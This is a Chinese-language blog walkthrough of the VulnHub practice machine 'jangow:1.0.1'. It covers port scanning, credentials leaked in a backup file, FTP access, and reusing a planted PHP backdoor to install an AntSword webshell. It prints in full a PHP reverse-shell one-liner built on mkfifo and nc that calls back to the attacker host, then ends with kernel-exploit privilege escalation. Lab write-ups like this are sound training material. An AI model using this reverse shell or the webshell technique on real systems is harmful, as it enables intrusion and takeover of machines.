首页 > 其他分享 >vulnhub-jangow:1.0.1

vulnhub-jangow:1.0.1

时间:2024-01-18 13:11:07浏览次数:17  
标签:bin sbin 1.0 nologin systemd jangow vulnhub var usr

jangow:1.0.1

日常练习

0x01 信息收集

nmap老规矩扫一扫
image
192.168.56.118存活,80端口和21端口开着。
image
image
逛了一圈没看到什么有价值的信息,爆破一下路径看看。
image
site目录刚刚看过了,.backup看看是什么
image
这里面有数据库的账户密码,暂时不知道是用在哪。到这里没有什么有用的了。


0x02 FTP登录

刚刚端扫扫出来的另一个21端口,利用windows的直接在文件路径下键入

ftp://192.168.56.118

这里需要输入账户密码,匿名登陆登不上去,这里用刚刚网页上看到数据库密码

jangow01
abygurl69

image
登录成功,路径应该是/var/www/,进入html/site下
image
有一个busque.php文件,。


0x03 后门连接

查看发现是一个后门
image
利用这个后门再写一个后门(连个蚁剑)
image
写入成功
image
尝试连接蚁剑
image
连接成功


0x04 反弹shell

连个蚁剑方便上传文件,因为直接用nc反弹不了蚁剑,这里只能用php反弹shell,写入shell.php

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 443 >/tmp/f");?>

百度到一个反弹shell,这里用443是因为只能用这个端口才能,其他端口做了限制。
在本地开启监听

nc -lvvp 443

然后访问

http://192.168.56.118/site/shell.php

image
成功反弹shell


0x05 切换用户

可以看看/etc/passwd文件有哪些用户

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
jangow01:x:1000:1000:desafio02,,,:/home/jangow01:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:111:118:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:112:119:MySQL Server,,,:/nonexistent:/bin/false

有一个jangow01用户,jangow01目录下有一个user.txt文件
image
看着像md5,拿去解密看看
image
猜测应该是jangow01的密码。
但是这里尝试了jangow01的密码不是解得的密码,于是想到原来数据库密码。
image
登录成功。


0x06 提升权限

查看一下linux内核版本

uname -a

image
用kali查看可利用的exp
image
下载到当前目录
image
然后利用蚁剑上传到目标主机的tmp目录
image
编译45010.c文件
image
编译后得到exp文件,运行
image
提权成功!查看root目录拿flag
image
完结撒花!


0x07 总结

考完试来做做练习(哈哈考试全过开心),简单的练习,好久没做了。

标签:bin,sbin,1.0,nologin,systemd,jangow,vulnhub,var,usr
From: https://www.cnblogs.com/y2xsec/p/17972282

相关文章

  • vulnhub-devguru(sudo提权)
    环境准备:靶机192.168.0.100攻击机kali192.168.0.128演示使用nmap扫描全端口首先访问80端口 信息收集发现访问/.git/config存在,使用githack获取源码  访问adminer.php,为一个mysql的登录界面。 查找配置文件,找到mysql登录密码。/config/database.php 登录数......
  • 机器学习周刊第六期:哈佛大学机器学习课、Chatbot Ul 2.0 、LangChain v0.1.0、Mixtral
    ---date:2024/01/08---吴恩达和Langchain合作开发了JavaScript生成式AI短期课程:《使用LangChain.js构建LLM应用程序》大家好,欢迎收看第六期机器学习周刊本期介绍10个内容,涉及Python、机器学习、大模型等,目录如下:1、哈佛大学机器学习课2、第一个JavaScript生成......
  • vulnhub-toppo(suid提权sudo提权)
    环境准备靶机192.168.116.138攻击机kali192.168.116.130演示直接访问webadmin目录下存在密码本使用ssh连接,账号ted,密码12345ted123使用项目进行探测LinEnumhttps://github.com/rebootuser/LinEnum 存在python可以使用suid提权使用python反弹shell /usr/b......
  • vulnhub下载
    importbs4importrequests#importlogging#logging.basicConfig(level=logging.DEBUG)defsearch_items(keywork:str)->list[str]:resp=Nonetry:resp=requests.get(url="https://vulnhub.com/?q={}".format(keywork))......
  • vulnhub-matrix(cve-2022-0847提权)
    环境准备靶机matrix192.168.116.134攻击机kali192.168.116.130演示启动靶机,使用nmap探测网段nmap192.168.116.0/24 扫描192.168.116.134全端口nmap-p1-65535192.168.116.134 访问网站 扫描目录gobusterdir-uhttp://192.168.116.134/-xphp,bak,tx......
  • vulnhub-lampiao(linux脏牛提权)
    环境准备靶机-lampiao攻击机-kali演示使用nmap探测内网网络,我这里使用NAT网络,网段为192.168.116.0/24nmap192.168.116.0/24发现192.168.116.136存活,扫描全端口nmap-p1-65535192.168.116.136 访问1898端口发现为drupal使用msf来进行攻击searchdrupal......
  • 【渗透测试】Vulnhub Corrosion 1
    渗透环境攻击机:   IP: 192.168.226.129(Kali)靶机:     IP:192.168.226.128靶机下载地址:https://www.vulnhub.com/entry/corrosion-1,730/进行渗透一、获取端口信息nmap或者arp-scan都能扫除IP,这里就不赘述了。先看看开放了哪些端口。开放了22和80端口,访问8......
  • Schema “public“ has version 1.0.0, but no migration could be resolved in the c
    该错误信息是由Flyway报告的,指出在应用程序的数据库迁移过程中遇到了问题。Flyway是一种流行的数据库迁移工具,用于版本控制数据库模式的变化。具体来说,错误信息Schema"public"hasversion1.0.0,butnomigrationcouldberesolvedintheconfiguredlocations!表明以下......
  • 【2024潇湘夜雨】WIN11_Pro_Dev_23612.1000软件选装纯净版1.06
    【系统简介】=============================================================1.本次更新母盘来自WIN11_Pro_Dev_23612.1000。2.增加部分优化方案,手工精简部分较多。3.OS版本号为23612.1000。精简系统只是为部分用户安装,个别要求高的去MSDN下。4.集成《DrvCeo-2.15.0.5》网卡版、运......
  • 百度网盘(百度云)SVIP超级会员共享账号每日更新(2024.01.05)
    一、百度网盘SVIP超级会员共享账号可能很多人不懂这个共享账号是什么意思,小编在这里给大家做一下解答。我们多知道百度网盘很大的用处就是类似U盘,不同的人把文件上传到百度网盘,别人可以直接下载,避免了U盘的物理载体,直接在网上就实现文件传输。百度网盘SVIP会员可以让自己百度账......